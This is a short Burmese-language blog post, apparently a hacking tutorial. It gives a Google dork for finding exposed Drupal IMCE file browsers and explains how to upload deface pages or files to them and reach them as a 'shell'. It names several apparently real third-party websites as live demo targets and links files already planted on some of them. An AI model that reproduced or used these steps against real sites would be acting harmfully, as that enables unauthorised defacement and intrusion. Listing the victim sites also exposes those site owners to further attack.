ပထမဆံဳး google.comကိုသြားပါ....ဒီdork ကုဒ္ကို search ထဲမွာ၇ိုက္ျပီးရွာလိုက္ပါ...
Google dork:"inurl:"/imce?dir=" intitle:"File Browser"
exploit : http://website.com/imce?dir=
Shell Access : http://website.com/files/yourfilehere
http://www.website.com/abc/files/abc/yourfilehere
http://www.website.com/abc/files/abc/yourfilehere
အဲဒီမွာresults ေတြၾကလာပါလိမ့္မယ္ အဲဒီကတစ္ဆိုဒ္ကိုေရြးျပီးမိမိၾကိဳက္တာတင္ႏိူင္ပါတယ္..
.တစ္ခ်ိဳ့ဆိုဒ္ေတြကေတာ့.ပံုပဲတင္လုိ႔ရပါတယ္...စမ္းၾကည့္ၾကေပါ့.
ပထမဆံုးဒီdirectoryအတိုင္းေလးရွာၾကည့္ေပါ့.
http://website.com/imce?dir=
အဲဒီမွာပံဳမွာျပထားတဲ့အတိုင္းupload ကိုႏိွပ္ျပီးမိမိdeface တင္ခ်င္တာကိုတင္ႏိူင္ပါတယ္.
See this link:http://ciam.inra.fr/biosp/sites/ciam.inra.fr.biosp/files/images/medium_safe_image.php_.png ဒါကေတာ့ပံုေပါ့
http://www.la-gerbille.net/sites/default/files/tabelka/test.html ဒါေလးကhtml file ကိုdefaceတင္ထားတာပါ
Live demo : http://labourlakesandfurness.co.uk/imce?dir=
Result: http://labourlakesandfurness.co.uk/sites/labourlakesandfurness.co.uk/files/test.html
Other demos
http://correaporto.com.br/english/imce?dir=.
http://www.somaly.org/imce?dir=
http://1daygraphics.com/imce?dir=client
0 comments:
Post a Comment